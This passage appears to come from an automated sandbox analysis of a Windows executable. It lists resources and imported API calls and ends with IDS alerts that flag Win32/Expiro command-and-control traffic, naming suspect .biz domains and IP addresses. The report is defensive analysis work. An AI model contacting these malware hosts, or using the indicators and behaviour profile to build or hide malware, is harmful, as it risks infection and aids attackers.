                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43c9b00xe6dataEnglishUnited States0.6347826086956522
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43ca980x390dataEnglishUnited States0.4418859649122807
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43ce280x21cdataEnglishUnited States0.5037037037037037
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43d3300x390dataEnglishUnited States0.4692982456140351
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43d6c00x1dcdataEnglishUnited States0.5441176470588235
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43d8a00x346dataEnglishUnited States0.46897374701670647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43dbe80x334dataEnglishUnited States0.43658536585365854
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43c9580x58dataEnglishUnited States0.8068181818181818
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43df200x23cdataEnglishUnited States0.5122377622377622
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43e8f00x1c2dataEnglishUnited States0.5066666666666667
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43e1600x160dataEnglishUnited States0.5994318181818182
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43e2c00xb2dataEnglishUnited States0.7191011235955056
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43e3780x3d4dataEnglishUnited States0.3408163265306122
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43e7500x19edataEnglishUnited States0.6280193236714976
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43eab80x1a2dataEnglishUnited States0.5741626794258373
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43ec600x34dataEnglishUnited States0.8076923076923077
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43ec980x2a8dataEnglishUnited States0.5338235294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x43ef400x382dataEnglishUnited States0.48552338530066813
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x3305200xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_DIALOG0x3306080x34dataEnglishUnited States0.9038461538461539
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x469e400x1f6Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.44223107569721115
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a0380x3edataEnglishUnited States0.7096774193548387
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a0780x60dataEnglishUnited States0.8125
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a0d80x76dataEnglishUnited States0.8983050847457628
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a1500xb6AmigaOS bitmap font "(W\211[\335\210E\232\325R\013z\017_/", 25451 elements, 2nd, 3rdEnglishUnited States0.8791208791208791
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a2080x110dataEnglishUnited States0.7794117647058824
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a3180x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46441947565543074
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a5300x42dataEnglishUnited States0.6818181818181818
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a5780x116dataEnglishUnited States0.5323741007194245
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a6900x14adataEnglishUnited States0.5545454545454546
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46c2b80x32cdataEnglishUnited States0.4125615763546798
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46c5e80x248dataEnglishUnited States0.5085616438356164
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d2e00x84dataEnglishUnited States0.5833333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46c8300x2a8dataEnglishUnited States0.36176470588235293
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cad80x20edataEnglishUnited States0.3155893536121673
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cce80x24cdataEnglishUnited States0.4370748299319728
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d3680x3cdataEnglishUnited States0.65
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46cf380x16edataEnglishUnited States0.39344262295081966
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d0a80xa6Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.7228915662650602
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d3a80x184dataEnglishUnited States0.4742268041237113
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d5300x66dataEnglishUnited States0.696078431372549
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d7d80x1d6Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0EnglishUnited States0.35319148936170214
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d5980x186dataEnglishUnited States0.5384615384615384
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d7200xb2dataEnglishUnited States0.6179775280898876
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d9b00x48Matlab v4 mat-file (little endian) a, numeric, rows 0, columns 0EnglishUnited States0.7083333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46d1500x18cdataEnglishUnited States0.398989898989899
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46a8980x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46aa200x4eedataEnglishUnited States0.375594294770206
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b2a00x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46afc00x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bce80x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46af100xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bbd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b5080x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46b9b00x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bcb80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_STRING0x46bd780x53edataEnglishUnited States0.2965722801788376
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4668280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4665880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x465da80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x465ef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4660480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4661980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4662e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4664380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4666d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x4669780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x466ac80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x466c180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f2980x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fa880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f3f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f9380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f7e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3301180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f6980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fd280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32f5480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fbd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32fe780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x32ffc80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3302680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3303b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_CURSOR0x3305080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x2f59000x22dataEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4670780x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4674b00x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x4697080x5adataEnglishUnited States0.7444444444444445
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_GROUP_ICON0x469cf80x22dataEnglishUnited States1.1176470588235294
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_VERSION0x32eda80x2fcdataEnglishUnited States0.4698952879581152
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_MANIFEST0x46d9f80x4d7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1179), with CRLF line terminatorsEnglishUnited States0.47699757869249393
                                                                                                                                                                                                                                                                                                                                                                                                                  None0x466c300x1cdataEnglishUnited States1.2857142857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  None0x466c500x18dataEnglishUnited States1.2916666666666667

                                                                                                                                                                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                                                                                                                                                                  KERNEL32.dllGetStringTypeW, WriteConsoleW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, InitializeSListHead, ExitProcess, GetStdHandle, GetFileType, SetStdHandle, HeapQueryInformation, QueryPerformanceFrequency, VirtualQuery, VirtualAlloc, GetCommandLineA, FreeLibraryAndExitThread, ExitThread, CreateThread, CreateDirectoryW, RtlPcToFileHeader, RtlUnwindEx, OutputDebugStringW, LCMapStringW, GetCPInfo, GetStartupInfoW, GetSystemTimeAsFileTime, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WaitForSingleObjectEx, ResetEvent, GetUserDefaultLCID, GetTempFileNameW, FindResourceExW, SystemTimeToTzSpecificLocalTime, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FileTimeToLocalFileTime, SetErrorMode, SearchPathW, GetProfileIntW, GetTempPathW, VirtualProtect, GlobalGetAtomNameW, GetThreadLocale, lstrcmpiW, IsDebuggerPresent, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, GlobalFlags, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GetCurrentDirectoryW, GetFileSize, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, CompareStringW, GlobalFindAtomW, EncodePointer, CopyFileW, MulDiv, GlobalSize, lstrcpyW, GlobalFree, GlobalUnlock, FreeResource, GlobalAddAtomW, GetCurrentProcessId, lstrcmpW, GlobalDeleteAtom, GlobalLock, GlobalAlloc, LoadLibraryExW, GetCurrentThread, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, GetModuleHandleExW, InitializeCriticalSectionAndSpinCount, SetLastError, OutputDebugStringA, ResumeThread, SuspendThread, SetThreadPriority, GetCurrentThreadId, CreateEventW, SetEvent, VerifyVersionInfoW, VerSetConditionMask, LocalFree, FormatMessageW, SearchPathA, GetLocalTime, SetFileAttributesA, GetSystemInfo, lstrcpyA, CreateFileW, lstrlenA, GetModuleFileNameW, WriteFile, SizeofResource, GetFileAttributesW, GetWindowsDirectoryW, GetSystemDirectoryW, CreateProcessW, GetModuleHandleW, FindResourceW, LoadResource, LoadLibraryW, LockResource, GetModuleHandleA, WideCharToMultiByte, GetPrivateProfileStringW, MultiByteToWideChar, GetSystemDefaultLangID, GetPrivateProfileSectionNamesW, GetPrivateProfileIntW, WritePrivateProfileStringW, GetTickCount, Sleep, lstrcmpA, K32EnumProcesses, Process32FirstW, Process32NextW, CreateToolhelp32Snapshot, OpenProcess, GetProcessId, FileTimeToSystemTime, lstrlenW, GetProcessHeap, DeleteCriticalSection, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionEx, LeaveCriticalSection, GetCommandLineW, EnterCriticalSection, HeapFree, FreeLibrary, GetProcAddress, CloseHandle, GetLastError, GetVersionExW, WaitForSingleObject, GetCurrentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  USER32.dllMoveWindow, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, SetWindowLongW, EqualRect, CopyRect, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, SetForegroundWindow, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, SetFocus, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, InvalidateRect, UpdateWindow, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, CheckDlgButton, CreateAcceleratorTableW, UnregisterClassW, EnableWindow, IsIconic, GetMenuState, GetMenuStringW, MapDialogRect, SetWindowContextHelpId, UnhookWindowsHookEx, PtInRect, ScreenToClient, ClientToScreen, SetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, GetLastActivePopup, GetWindowLongW, IsWindowEnabled, SetCursor, ShowOwnedPopups, PostQuitMessage, DrawIconEx, IsRectEmpty, OffsetRect, InflateRect, FillRect, DrawFocusRect, GetSysColorBrush, GetSysColor, MapWindowPoints, RedrawWindow, SetWindowRgn, DrawStateW, GetFocus, DrawFrameControl, DrawEdge, RegisterWindowMessageW, SetWindowTextW, IsDialogMessageW, IntersectRect, SetLayeredWindowAttributes, SetRectEmpty, LoadCursorW, SystemParametersInfoW, EnumDisplayMonitors, SetParent, MonitorFromPoint, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DestroyIcon, CallNextHookEx, SetWindowsHookExW, LoadImageW, CopyImage, TrackMouseEvent, IsZoomed, CharUpperW, GetAsyncKeyState, SetCapture, ReleaseCapture, GetClientRect, LoadIconW, DrawIcon, GetSystemMetrics, SendMessageW, PostMessageW, GetDesktopWindow, MessageBoxA, GetWindowTextA, PeekMessageW, DispatchMessageW, RegisterWindowMessageA, GetClassNameA, GetWindow, GetWindowThreadProcessId, GetParent, GetClassNameW, FindWindowW, EnumWindows, GetDlgCtrlID, IsWindow, ShowWindow, EnumChildWindows, GetWindowRect, SetDlgItemTextW, MessageBoxW, SetWindowPos, wsprintfW, GetMessageW, TranslateMessage, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, GetKeyNameTextW, SubtractRect, RegisterClipboardFormatW, CharUpperBuffW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, FrameRect, LoadAcceleratorsW, IsClipboardFormatAvailable, PostThreadMessageW, IsCharLowerW, MapVirtualKeyExW, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, GetComboBoxInfo, CreateMenu, DestroyCursor, GetWindowRgn, HideCaret, InvertRect, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, GetNextDlgGroupItem, InvalidateRgn, CopyAcceleratorTableW, CharNextW, UpdateLayeredWindow, SendDlgItemMessageA, WaitMessage, RealChildWindowFromPoint, GetUpdateRect, SetClassLongPtrW, DestroyAcceleratorTable, ModifyMenuW, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CopyIcon, GetIconInfo, GetDoubleClickTime, EnableScrollBar, DestroyMenu, SetTimer, KillTimer, LoadMenuW, GetSystemMenu, DeleteMenu, MessageBeep, WindowFromPoint, NotifyWinEvent, SetCursorPos, SetRect, UnionRect, BringWindowToTop, CreatePopupMenu, LockWindowUpdate
                                                                                                                                                                                                                                                                                                                                                                                                                  GDI32.dllPtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextColor, SetTextAlign, GetObjectW, MoveToEx, TextOutW, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectW, GetMapMode, LineTo, DPtoLP, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, RealizePalette, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateRoundRectRgn, Rectangle, GetRgnBox, OffsetRgn, RoundRect, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, EnumFontFamiliesExW, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetViewportOrgEx, LPtoDP, GetWindowOrgEx, SetPixelV, GetTextFaceW, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteObject, CreatePatternBrush, CreatePen, CreateCompatibleDC, CreateBitmap, BitBlt, GetDeviceCaps, CreateDCW, CopyMetaFileW, GetTextMetricsW, Polyline, Polygon, CreatePolygonRgn, ExtTextOutW, PatBlt, GetTextExtentPoint32W, GetTextColor, GetBkColor, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreateHatchBrush, CreateEllipticRgn, CombineRgn, SetRectRgn, Ellipse, DeleteDC
                                                                                                                                                                                                                                                                                                                                                                                                                  MSIMG32.dllTransparentBlt, AlphaBlend
                                                                                                                                                                                                                                                                                                                                                                                                                  WINSPOOL.DRVDocumentPropertiesW, OpenPrinterW, ClosePrinter
                                                                                                                                                                                                                                                                                                                                                                                                                  ADVAPI32.dllRegQueryInfoKeyW, OpenProcessToken, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW, SetTokenInformation, AllocateAndInitializeSid, GetLengthSid, DuplicateTokenEx, RegCloseKey, RegQueryValueExA, RegSetValueExW, RegQueryInfoKeyA, RegOpenKeyExA, RegQueryValueExW, RegEnumKeyExA, LookupPrivilegeValueW, InitiateSystemShutdownW, AdjustTokenPrivileges
                                                                                                                                                                                                                                                                                                                                                                                                                  SHELL32.dllShellExecuteExW, SHFileOperationA, SHGetSpecialFolderPathW, DragFinish, DragQueryFileW, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHGetDesktopFolder, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc
                                                                                                                                                                                                                                                                                                                                                                                                                  COMCTL32.dllInitCommonControlsEx
                                                                                                                                                                                                                                                                                                                                                                                                                  SHLWAPI.dllPathFindExtensionW, PathFindFileNameW, PathRemoveFileSpecW, PathIsUNCW, StrFormatKBSizeW, PathStripToRootW, PathFileExistsW
                                                                                                                                                                                                                                                                                                                                                                                                                  UxTheme.dllDrawThemeBackground, GetThemeColor, GetCurrentThemeName, IsAppThemed, CloseThemeData, DrawThemeText, GetWindowTheme, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, OpenThemeData, DrawThemeParentBackground
                                                                                                                                                                                                                                                                                                                                                                                                                  ole32.dllIsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleUninitialize, CoFreeUnusedLibraries, OleLockRunning, RevokeDragDrop, RegisterDragDrop, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, CoLockObjectExternal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoDisconnectObject, CreateStreamOnHGlobal, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoCreateGuid, CLSIDFromString, CoInitializeEx, CoUninitialize, CoRevokeClassObject, CoRegisterMessageFilter, OleInitialize
                                                                                                                                                                                                                                                                                                                                                                                                                  OLEAUT32.dllSysFreeString, SysAllocStringLen, VariantInit, VariantClear, VariantChangeType, SysAllocString, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, SysStringLen, LoadTypeLib, OleCreateFontIndirect, VarBstrFromDate, VariantCopy
                                                                                                                                                                                                                                                                                                                                                                                                                  oledlg.dllOleUIBusyW
                                                                                                                                                                                                                                                                                                                                                                                                                  gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromScan0
                                                                                                                                                                                                                                                                                                                                                                                                                  SETUPAPI.dllCM_Reenumerate_DevNode_Ex, CM_Locate_DevNode_ExW, SetupDiEnumDeviceInfo, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupCloseInfFile, SetupFindFirstLineA, SetupFindNextLine, SetupGetMultiSzFieldA, SetupOpenInfFileW, SetupGetStringFieldA, SetupDiDestroyDeviceInfoList
                                                                                                                                                                                                                                                                                                                                                                                                                  USERENV.dllCreateEnvironmentBlock
                                                                                                                                                                                                                                                                                                                                                                                                                  newdev.dllUpdateDriverForPlugAndPlayDevicesW
                                                                                                                                                                                                                                                                                                                                                                                                                  OLEACC.dllCreateStdAccessibleObject, LresultFromObject, AccessibleObjectFromWindow
                                                                                                                                                                                                                                                                                                                                                                                                                  IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                                                                                                                                                                                                                                                                                                                                                                  WINMM.dllPlaySoundW

                                                                                                                                                                                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:00.848951+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549705TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:00.848951+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549705TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:02.388480+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549707TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:02.388480+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549707TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:03.407124+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970944.221.84.10580TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:04.593285+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:04.593285+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:04.596830+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5620671.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:06.156760+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5640981.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:43.727257+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.549919TCP
